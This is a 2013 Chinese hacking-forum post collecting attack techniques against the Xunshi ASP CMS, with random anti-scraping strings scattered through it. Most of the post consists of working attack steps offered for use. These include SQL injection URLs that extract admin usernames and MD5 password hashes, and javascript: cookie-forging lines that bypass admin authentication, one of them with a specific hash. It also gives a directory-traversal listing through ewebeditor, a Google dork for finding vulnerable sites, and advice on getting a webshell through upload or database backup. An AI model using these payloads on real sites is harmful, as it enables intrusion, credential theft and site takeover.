找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2384|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
9 A7 n9 M& K1 }6 ^" z
3 ?2 \! L, z2 N' _: Z7 p在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
/ A9 I1 J! F1 a* J5 \* g. ~# F, a- B+ h0 X
以下本文总结来自黑防去年第9期杂志上的内容...
) s' _9 j8 |: z5 q( H
* C2 I* t2 ]* _2 \* B% |$ b先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%9 I: M7 ~0 G" e2 E- n

0 A/ Q8 e( ?0 M  {; D$ _26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
$ [# l1 o* E  C( s8 U7 ^6 o4 \7 M6 J4 I6 l  w  h
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
" v* K. F' U$ m# ^% j这里一个注入
& o, n6 T7 X* o: _* S* F9 N0 d2 r* A7 q: ]% H5 J0 }' N
效果如图:
' L9 W/ _# [3 Q. `/ d7 _8 f" h$ Q' H3 Q

, T1 Z# i" `. q. x& Y
* _. \: {2 W8 m/ p这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.4 m4 c+ r! I$ q6 o5 J: s
1 T" M/ c5 p$ S
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
( K9 g; U; y0 ~' s
/ z9 W) |6 X- n4 `javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
. u1 k1 A+ o* U; ^! e
9 R$ n' A  d' F7 N那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
1 ^6 h; x5 i9 Z$ u, A: j
9 u' S3 [/ k; o, n* `( s* c因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞/ {' F! y6 \% w$ j- O9 ^" a9 n

2 C) p4 R/ l( N" a" K5 T它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
* @/ l: e% Z; d) ~( z2 h
( H) S# i, j7 Z3 f  @访问这页面来列目录..步骤如下:
. I& U. A7 ?) p! B4 s
. B" K) `+ y% \" r7 Zjavascript:alert(document.cookie="admindj=1")
9 }) g6 A/ H, U
3 x) Z. p  D1 ehttp://www.political-security.co ... asp?id=46&dir=../..! f8 G- B: Z$ W
8 [5 W- P" V2 A
效果如图:, |. N" w( k( }, Y/ Y8 c
& ?0 F; J! f6 {/ z" C, B

6 r8 b% ~/ L# Z1 w. k, t# j. |, h% v9 w" Q# h5 T5 `/ J& i
这样全站目录都能瞧了..找到后台目录..进去..
2 _6 R- h& q. x1 c3 s0 v% Z- j; _/ \# ]' |- y! }2 D, Y2 a( ]* z
那么进了后台怎么拿shell??上传--备份就ok了..
: T8 g5 j6 ?' B0 \8 l' W$ A" m4 M7 ~' ]/ E
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
% G8 J) Q! n+ f& F9 U8 C
/ H$ L4 t) ~8 L+ Q这个我也碰到过一次..你都可以通过列目录来实现..
% n9 a( n1 f3 ^8 ]3 _8 j
% f" |7 K5 e5 c* T8 L1 s0 ~javascript:alert(document.cookie="admindj=1") ; o3 W5 j( S. j. |( i
5 I, p4 p4 E  Y4 [* }6 V9 h% x0 a
http://www.political-security.co ... p?action=BackupData
, g- C+ N+ y2 S
; |  ]% S3 W! Q备份ok..
3 j5 o3 l7 E' y6 r' S; d' N& ^3 ?" Z. ?4 R
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?& A' j0 p1 z0 @6 I( I' d0 z4 G

) P" x) u/ [+ o! z+ I在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下" K" Q* _' Y. P" E

8 x2 x2 T$ D3 b3 l然后访问此页面进行注入..步骤如下:4 f$ w$ c0 O; h3 Z+ i- g
% i4 N2 A7 ^( E3 w
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
( G, u5 N, U  @. }( o6 q# L  e! r2 ~  }
然后请求admin/admin_chk.asp页面
& ?/ w4 y4 B9 }2 |1 u% u! i' Q+ z4 B' g* h7 Z
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%7 n9 D* K; ]) ^/ K; k

1 J, J/ @( f# T. A2 I26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
4 T+ s) ?; M  x6 n, y9 b$ r4 @) m
4 d8 Y* a8 ^% m4 q. I效果如图所示:2 ?  ^. g; R+ Y( E4 f' F9 e, n. O" N

* F2 s  L% `+ i# x0 x ' q1 f( Y. o. W/ @

& i5 z3 f# u- g9 M讯时漏洞2" `; O9 k: W7 G' O6 f+ N
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
" t* [' Z4 k  }- [
* ~, w4 j( c  C/ `+ b1、/admin/admin_news_pl_view.asp?id=1
6 [7 y' f" e  {) y' E; B- g, G3 b- L//id任意 填入以下语句: f6 D! @" ^0 w

; P6 r3 ~* S9 G$ a1 A: B2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
! S. Q; [) B0 N6 ^: P. F 1 z1 ~6 [2 ~# B3 A

0 o4 |9 S; e4 C+ T/ d' w8 w6 z* s! U
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
* K1 b! r1 |+ q) p : R2 f( w- b: W+ n- i

5 h2 y: @9 i4 T# W  b
5 a2 H8 _3 c! O0 f) l爆出管理员帐号和密码了) u9 s4 J* I$ z
" o# Z! H0 j9 ^0 b/ v
3 D8 c* S7 X/ H: E7 T- j

- t& Y) p7 B' ]2 E" b, ~) G# D4、cookies进后台
- {. Q4 ^8 Q3 f! @5 Y5 P7 Q: Y 9 n3 j+ `  o+ u5 f" H% }
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
/ j  i. q- a; J5 | % t. N: H, F% y7 p" o. _
0 F2 z% z" C7 k" q- j( P& b% E
4 c  P& T, o7 M6 v8 p) X/ [
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!+ p; @$ G" t' x$ B& g, }" |/ z2 s

( ]2 |1 |9 ?* y3 v0 ~, j0 H6 {: a  s" K; ?+ J! \
. Y: l/ w( {. @9 g% B' J. X7 {
6、后台有上传和备份取SHELL不难。4 Z! {5 L( n$ Y. ?* Q5 Q4 z' t
. h/ o; M$ ]9 r5 A6 B8 o
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
: I7 p0 N0 C8 _" o" G ' M- w, ^% F# H. _8 p! D
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!; |9 y3 x" L4 V/ \2 `

  l  }  X1 N) Z9 V: K6 G: t" U' C& n' z! s
  k. [. Q( o- x; \" u0 D' U1 a: r& s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表